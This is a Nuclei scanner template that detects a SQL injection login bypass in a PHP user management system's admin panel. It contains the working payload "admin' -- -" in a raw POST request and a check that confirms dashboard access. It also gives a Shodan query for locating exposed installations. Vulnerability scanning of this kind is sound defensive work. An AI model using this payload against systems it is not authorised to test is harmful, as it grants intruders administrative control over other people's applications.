nuclei-templates/http/vulnerabilities/other/user-management-system-sqli...

46 lines
1.5 KiB
YAML

id: user-management-system-sqli
info:
name: User Management/Registration & Login v3.0 - SQL Injection
author: f0xy
severity: high
description: |
User Registration & Login and User Management System v3.0 admin panel has SQL vulnerability. Even though the person who discovered the vulnerability tested it in version 3.0, version 3.2 also contains the same vulnerability. It can be exploited by entering "admin' -- -" as the username parameter in the admin panel.
reference:
- https://www.exploit-db.com/exploits/51695
- https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
metadata:
verified: true
max-request: 2
shodan-query: title:"Registration and Login System"
tags: sqli,auth-bypass,user-management
http:
- raw:
- |
POST /admin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin%27+--+-&password=whatever&login=
- |
GET /admin/dashboard.php HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Admin Dashboard"
- "Manage Users"
- "Signout"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100bc1d5effe5bde1f24beca0c441db912f123fe9b6c02ce9f7044820dbc894a41f0221009ebb0ae0179a9fab2d04d9e4f0b909283e868e4950fe9a3681a7e90ff6f202cc:922c64590222798bb761d5b6d8e72950